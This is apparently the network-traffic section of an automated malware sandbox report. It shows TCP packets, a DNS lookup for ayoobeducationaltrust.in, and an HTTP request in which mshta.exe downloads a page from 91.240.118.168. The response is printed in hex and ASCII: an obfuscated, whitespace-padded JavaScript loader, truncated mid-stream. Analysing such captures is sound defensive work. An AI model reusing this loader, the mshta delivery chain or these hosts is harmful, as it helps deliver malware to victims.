Jan 28, 2022 21:30:08.155802965 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.155810118 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.155842066 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.155881882 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.155883074 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.155920982 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.155957937 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.155960083 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.155998945 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.156037092 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.156037092 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.156076908 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.156114101 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.156115055 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.156153917 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.156191111 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.156193018 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.156233072 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.156270027 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.156603098 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.156647921 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.156688929 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.156702995 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.156728029 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.156768084 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.156779051 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.156809092 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.156845093 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.156846046 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.156887054 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.156922102 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.156925917 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.156966925 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.157004118 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.157007933 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.157044888 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.157078981 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.157083988 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.157123089 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.157159090 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.157159090 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.157200098 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.157233000 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.157238960 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.157279015 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.157313108 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.157318115 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.157355070 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.157392025 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.157393932 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.157433987 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.157469034 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.157469988 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.157510042 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.157541990 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.157546997 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.157587051 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.157622099 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.157625914 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.157663107 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.157701015 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.157701969 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.157741070 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.157776117 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.157777071 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.157816887 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.157867908 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.157887936 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.157926083 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.157960892 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.271538973 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.271579981 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.271601915 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.271624088 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.271635056 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.271646023 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.271665096 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.271672010 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.271698952 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.271713972 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.271725893 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.271750927 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.271770000 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.271774054 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.271797895 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.271814108 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.271821022 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.271846056 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.271859884 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.271867990 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.271893024 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.271905899 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.271914959 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.271938086 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.271956921 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.271959066 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.271982908 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272001982 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.272006035 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272028923 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272052050 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272053003 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.272074938 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272093058 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.272098064 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272120953 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272144079 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272145987 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.272166967 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272183895 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.272187948 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272213936 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272231102 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.272238016 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272262096 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272284985 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272309065 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272322893 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.272330999 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.272330999 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272356033 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272378922 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272388935 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.272402048 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272424936 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272439957 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.272444963 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272466898 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272485971 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272494078 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.272509098 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272526979 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.272530079 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272552967 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272567034 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.272576094 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272588968 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.272594929 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272618055 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272629023 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.272639990 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272659063 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272676945 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.272680998 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272706032 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272722006 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.272728920 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272753000 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272763014 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.272773981 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272794008 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272806883 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.272816896 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272838116 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272852898 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.272859097 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272881985 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272893906 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.272903919 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272927046 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272938013 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.272948027 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272969961 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.272981882 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.272990942 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.273027897 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.274768114 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.274806023 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.274832964 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.274857998 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.274879932 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.274883986 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.274905920 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.274909019 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.274936914 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.274947882 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.274961948 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.274986029 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.274995089 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.275010109 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.275033951 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.275043011 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.275060892 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.275085926 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.275094032 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.275111914 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.275136948 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.275157928 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:08.275161028 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.275185108 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:08.275226116 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:12.965950012 CET	80	49167	139.59.58.214	192.168.2.22
Jan 28, 2022 21:30:12.968087912 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:30:13.878909111 CET	49165	80	192.168.2.22	91.240.118.168
Jan 28, 2022 21:31:10.343867064 CET	80	49166	91.240.118.168	192.168.2.22
Jan 28, 2022 21:31:10.345071077 CET	49166	80	192.168.2.22	91.240.118.168
Jan 28, 2022 21:31:45.376997948 CET	49166	80	192.168.2.22	91.240.118.168
Jan 28, 2022 21:31:45.435765028 CET	80	49166	91.240.118.168	192.168.2.22
Jan 28, 2022 21:31:48.294363976 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:31:49.104053020 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:31:50.804527998 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:31:54.096460104 CET	49167	80	192.168.2.22	139.59.58.214
Jan 28, 2022 21:32:00.508651972 CET	49167	80	192.168.2.22	139.59.58.214

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 28, 2022 21:30:05.390374899 CET	52167	53	192.168.2.22	8.8.8.8
Jan 28, 2022 21:30:05.741262913 CET	53	52167	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 28, 2022 21:30:05.390374899 CET	192.168.2.22	8.8.8.8	0x8286	Standard query (0)	ayoobeducationaltrust.in	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 28, 2022 21:30:05.741262913 CET	8.8.8.8	192.168.2.22	0x8286	No error (0)	ayoobeducationaltrust.in		139.59.58.214	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

91.240.118.168

ayoobeducationaltrust.in

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	91.240.118.168	80	C:\Windows\System32\mshta.exe

Timestamp	kBytes transferred	Direction	Data
Jan 28, 2022 21:29:59.674928904 CET	0	OUT	GET /vvv/ppp/fe.html HTTP/1.1 Accept: / Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 91.240.118.168 Connection: Keep-Alive
Jan 28, 2022 21:29:59.736197948 CET	2	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 28 Jan 2022 20:29:59 GMT Content-Type: text/html; charset=utf-8 Content-Length: 10938 Last-Modified: Thu, 27 Jan 2022 20:39:15 GMT Connection: keep-alive ETag: "61f302f3-2aba" Accept-Ranges: bytes Data Raw: 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 45 6d 75 6c 61 74 65 49 45 39 27 3e 3c 73 63 72 69 70 74 3e 6c 31 6c 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 7c 7c 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 3b 76 61 72 20 66 39 66 37 36 63 3d 74 72 75 65 3b 6c 6c 31 3d 64 6f 63 75 6d 65 6e 74 2e 6c 61 79 65 72 73 3b 6c 6c 6c 3d 77 69 6e 64 6f 77 2e 73 69 64 65 62 61 72 3b 66 39 66 37 36 63 3d 28 21 28 6c 31 6c 26 26 6c 6c 31 29 26 26 21 28 21 6c 31 6c 26 26 21 6c 6c 31 26 26 21 6c 6c 6c 29 29 3b 6c 5f 6c 6c 3d 6c 6f 63 61 74 69 6f 6e 2b 27 27 3b 6c 31 31 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 49 31 28 6c 31 49 29 7b 72 65 74 75 72 6e 20 6c 31 31 2e 69 6e 64 65 78 4f 66 28 6c 31 49 29 3e 30 3f 74 72 75 65 3a 66 61 6c 73 65 7d 3b 6c 49 49 3d 6c 49 31 28 27 6b 68 74 27 29 7c 6c 49 31 28 27 70 65 72 27 29 3b 66 39 66 37 36 63 7c 3d 6c 49 49 3b 7a 4c 50 3d 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 27 30 46 44 27 3b 72 31 4c 34 68 32 57 34 4a 59 59 65 4a 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 62 57 78 36 4a 49 6f 77 77 6e 4f 73 68 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 62 57 78 36 4a 49 6f 77 77 6e 4f 73 68 5b 30 5d 3d 27 65 5c 31 30 36 5c 31 31 33 46 25 33 34 25 33 36 43 25 33 31 27 20 20 20 3b 72 31 4c 34 68 32 57 34 4a 59 59 65 4a 5b 30 5d 3d 27 7f 3c 7f 21 7f 44 7f 4f 7f 43 7f 54 7f 59 7f 50 7f 45 7f 20 7f 68 7f 74 7f 6d 7f 6c 7f 20 7f 50 7f 55 7f 42 7f 4c 7f 49 7f 43 7f 20 7f 22 7f 2d 7f 2f 7f 2f 7f 57 7f 33 7f 43 7e 18 7f 44 7f 54 7f 44 7f 20 7f 58 7f 48 7f 54 7f 4d 7f 4c 7f 20 7f 31 7f 2e 7f 30 7f 20 7f 54 7f 72 7f 61 7f 6e 7f 73 7f 69 7f 74 7f 69 7f 6f 7f 6e 7f 61 7f 6c 7e 18 7f 45 7f 4e 7f 22 7e 15 7e 5c 6e 7f 74 7f 70 7f 3a 7e 18 7f 77 7e 42 7f 2e 7f 77 7f 33 7f 2e 7f 6f 7f 72 7f 67 7f 2f 7f 54 7f 52 7f 2f 7f 78 7e 5c 6e 7e 0c 7f 31 7f 2f 7e 1e 7f 44 7e 4e 7e 50 7f 6c 7f 31 7f 2d 7f 74 7e 2d 7e 2f 7e 31 7e 33 7e 35 7f 6c 7f 2e 7f 64 7f 74 7f 64 7f 22 7f 3e 7f 3c 7e 57 7f 20 7f 78 7e 0c 7e 2f 7f 3d 7f 22 7e 3d 7e 3f 7e 41 7e 43 7e 45 7e 47 7e 49 7f 2f 7f 31 7f 39 7e 79 7e 56 7e 0b 7f 6c 7e 66 7e 68 7f 65 7f 61 7f 64 7e 67 7f 73 7f 63 7f 72 7f 69 7f 70 7f 74 7f 3e 7f 65 7f 76 7e 36 7f 28 7f 75 7f 6e 7f 65 7d 04 7f 61 7f 70 7f 65 7f 28 7f 5c 27 7f 25 7f 37 7f 36 7f 25 7f 36 7f 31 7d 18 7f 32 7f 25 7f 32 7f 30 7d 18 7f 31 7f 79 7f 25 7f 33 7f 37 7d 26 7f 44 7d 20 7d 28 7f 32 7d 28 7f 33 7f 42 7f 5c 5c 7f 31 7d 1c 7d 31 7f 37 7d 1d 7f 33 7f 38 7d 29 7d 31 7f 32 7f 33 7f 74 7d 1e 7f 69 7d 31 7f 35 7f 36 7d 31 7f 34 7d 2c 7f 45 7d 43 7f 36 7f 72 7d 1b 7f 46 Data Ascii: <html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode\|\|document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')\|lI1('per');f9f76c\|=lII;zLP=location.protocol+'0FD';r1L4h2W4JYYeJ=new Array();bWx6JIowwnOsh=new Array();bWx6JIowwnOsh[0]='e\106\113F%34%36C%31' ;r1L4h2W4JYYeJ[0]='<!DOCTYPE html PUBLIC "-//W3C~DTD XHTML 1.0 Transitional~EN"~~\ntp:~w~B.w3.org/TR/x~\n~1/~D~N~Pl1-t~-~/~1~3~5l.dtd"><~W x~~/="~=~?~A~C~E~G~I/19~y~V~l~f~head~gscript>ev~6(une}ape(\'%76%61}2%20}1y%37}&D} }(2}(3B\\1}}17}38})}123t}i}156}14},E}C6r}F
Jan 28, 2022 21:29:59.736221075 CET	3	IN	Data Raw: 7d 1b 7f 44 7f 43 7d 40 7f 30 7f 61 7d 1e 7f 25 7f 34 7f 33 7d 4a 7d 1b 7f 34 7f 65 7d 20 7d 38 7f 33 7d 36 7d 55 7f 32 7f 43 7d 26 7d 36 7d 22 7f 32 7f 39 7d 26 7f 42 7f 66 7e 48 7d 5a 7d 40 7d 36 7d 2a 7f 33 7d 22 7d 2f 7d 6b 7d 26 7d 60 7f 33 Data Ascii: }DC}@0a}%43}J}4e} }83}6}U2C}&}6}"29}&Bf~H}Z}@}6}*3}"}/}k}&}`3}34}&}u}e}p15}2B} \|za}d}Bq}4}6},\|za3Dq}%}7}}m\|za6}75}@}B1}T}4~_} 0\|\r}&}2}8\|7Bif}Z} 1d}@}(63}165m}C5}E}=2}F\|4\|.}3u
Jan 28, 2022 21:29:59.736242056 CET	4	IN	Data Raw: 41 7d 06 7e 36 78 5f 7f 48 7f 65 7f 6c 7f 76 7f 65 7e 32 7f 63 78 5e 78 49 7e 2e 7f 73 7f 2d 7f 73 78 23 7c 28 7f 3b 7f 20 78 4f 78 70 7f 69 7f 7a 7f 65 78 58 7f 31 7b 59 7f 78 78 74 78 2e 78 30 7f 72 78 58 7f 23 7f 46 77 05 77 06 78 74 7f 62 79 Data Ascii: A}~6x_Helve~2cx^xI~.s-sx#\|(; xOxpizexX1{Yxxtx.x0rxX#Fwwxtby`kgro}d-wza~Hwx4x6x&>ThexIwrxA x.x" of y\'is pagww(w*w\r\|rc\|rx+by <b~gxOxIxKxMx@x/w wFCCx7>~#~% Guardi~.yxO~g/w:w
Jan 28, 2022 21:29:59.736295938 CET	6	IN	Data Raw: 65 25 34 31 25 37 34 25 32 38 25 35 46 25 33 31 25 32 39 25 33 42 6c 25 34 39 25 33 44 6c 25 33 34 27 20 20 20 3b 66 75 6e 63 74 69 6f 6e 20 66 66 4e 32 45 48 31 6f 6c 38 38 44 31 37 71 33 28 70 64 6a 33 6e 35 53 29 7b 69 35 66 77 45 62 71 49 47 Data Ascii: e%41%74%28%5F%31%29%3Bl%49%3Dl%34' ;function ffN2EH1ol88D17q3(pdj3n5S){i5fwEbqIG+=pdj3n5S};r1L4h2W4JYYeJ[0]+='xLwx\|rxxPx"x.~-~2~4xX{8}xwAwwCwwFx7~rzx~p~@/~Bw.pw1vvK.x.mxx~Ixix_x~.kx\'wYw;vv4w?xvxRxTxVxXxZwPx]x_xawRl
Jan 28, 2022 21:29:59.736316919 CET	7	IN	Data Raw: 78 23 71 09 7f 64 79 7c 72 13 7f 31 7f 49 72 71 72 73 78 61 7e 2d 7f 79 7d 16 7e 57 71 0b 77 1a 7d 01 71 0b 78 20 7f 64 7f 79 71 0b 7f 61 71 0b 77 76 7f 67 71 0b 77 51 7f 76 71 0b 73 3e 76 5a 72 7f 75 2a 74 75 72 7f 73 11 71 25 7f 6e 7f 70 7f 75 Data Ascii: x#qdy\|r1Irqrsxa~-y}~Wqw}qx dyqaqwvgqwQvqs>vZru*tursq%nputqpqscqsqt;sxtv&(q;sKxkxq~\':rfqz,rtq(79,qRqTqS7s7qXqTqYq\\q[q^qXu/wZ}zak;qHw2qKrfqqOrv}7,}Dqo7s85qo1qs,qSqS{qw}\|qavKaqdqf 3qi
